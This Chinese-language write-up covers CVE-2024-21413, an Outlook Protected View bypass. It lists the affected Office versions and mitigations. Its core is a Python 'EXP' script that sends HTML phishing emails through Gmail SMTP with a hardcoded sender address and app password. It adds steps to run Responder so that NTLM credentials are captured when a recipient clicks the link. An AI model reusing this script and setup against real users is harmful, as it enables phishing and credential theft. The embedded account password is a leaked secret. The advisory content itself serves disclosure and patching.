前言
Microsoft Office Outlook是微软办公软件套装的组件之一,它对Windows自带的Outlook express的功能进行了扩充。
Outlook的功能很多,可以用它来收发电子邮件、管理联系人信息、记日记、安排日程、分配任务。
一、漏洞描述
攻击者以预览窗格作为攻击媒介制作绕过受保护视图协议的恶意链接,绕过 Office 受保护的视图并在编辑模式打开文件。
成功利用此漏洞的攻击者可获取本地 NTLM 凭据信息并在目标计算机上远程执行任意代码
。
与其他漏洞(CVE-2022-30190
、CVE-2023-21716
)一起使用,可以实现远程代码执行!
二、影响版本
1、 Microsoft Office 2016 (64-bit edition)
2、 Microsoft Office 2016 (32-bit edition)
3、 Microsoft Office LTSC 2021 for 32-bit editions
4、 Microsoft Office LTSC 2021 for 64-bit editions
5、 Microsoft 365 Apps for Enterprise for 64-bit Systems
6、 Microsoft 365 Apps for Enterprise for 32-bit Systems
7、 Microsoft Office 2019 for 64-bit editions
8、 Microsoft Office 2019 for 32-bit editions
三、漏洞详情
EXP如下:
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
import os
# Define some color codes for terminal output
class colors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKCYAN = '\033[96m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
def print_header():
print(f"{colors.HEADER}{colors.BOLD}{'='*80}")
print(f"{colors.OKBLUE}{colors.BOLD}Email Sending Script{colors.ENDC} {colors.ENDC}CVE-2024-21413{colors.BOLD} Developed by https://github.com/ThemeHackers")
print(f"{colors.HEADER}{'='*80}{colors.ENDC}")
def send_email():
print_header()
# Get user input for sender's email address and password
sender_email = 'ah3112651@gmail.com'
sender_password = 'pnsbkvkxwfgwjueu'
# Get user input for receiver's email address
receiver_email = input(f"{colors.OKGREEN}Enter the recipient's email address: {colors.ENDC}")
# Create a new message object
msg = MIMEMultipart()
# Add sender, receiver, and subject to the message
msg['From'] = sender_email
msg['To'] = receiver_email
msg['Subject'] = input(f"{colors.OKGREEN}Enter email subject: {colors.ENDC}")
# Ask if user wants to add a link attachment
add_attachment = input(f"{colors.WARNING}Do you want to add a link attachment? (yes/no): {colors.ENDC}").lower()
if add_attachment == 'yes':
link_content = input(f"{colors.OKCYAN}Enter the URL: {colors.ENDC}").strip()
# Create HTML content with link
html_content = f"""\
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<style>
body {{
font-family: Arial, sans-serif;
margin: 0;
padding: 0;
background-color: #f4f4f4;
}}
.container {{
max-width: 600px;
margin: 0 auto;
background-color: #ffffff;
padding: 20px;
border-radius: 8px;
box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
}}
h1 {{
color: #333333;
font-size: 24px;
margin-bottom: 20px;
}}
p {{
color: #555555;
font-size: 16px;
line-height: 1.5;
}}
a {{
color: #007bff;
text-decoration: none;
font-weight: bold;
}}
a:hover {{
text-decoration: underline;
}}
</style>
</head>
<body>
<div class="container">
<h1>Hello!</h1>
<p>Click the link below to access the content:</p>
<p><a href="{link_content}">Click here to access the link</a></p>
</div>
</body>
</html>
"""
# Attach HTML content to the email
msg.attach(MIMEText(html_content, 'html'))
# Connect to SMTP server and send email
try:
with smtplib.SMTP('smtp.gmail.com', 587) as server:
server.starttls()
server.login(sender_email, sender_password)
server.send_message(msg)
print(f"{colors.OKGREEN}Email sent successfully.{colors.ENDC}")
except Exception as e:
print(f"{colors.FAIL}Failed to send email: {e}{colors.ENDC}")
if __name__ == "__main__":
os.system('clear') # Clears the terminal for a cleaner look
send_email()
复现环境如下
本地开启一个responder
responder -I eth0
脚本修改内容如下
注意格式
运行脚本等待邮箱接收
点击邮件内容链接,本地获取到服务器信息
四、缓解方案
1、应用 Microsoft 提供的最新安全更新。
2、确保 Outlook 和所有相关的 Office 应用程序已更新到最新版本。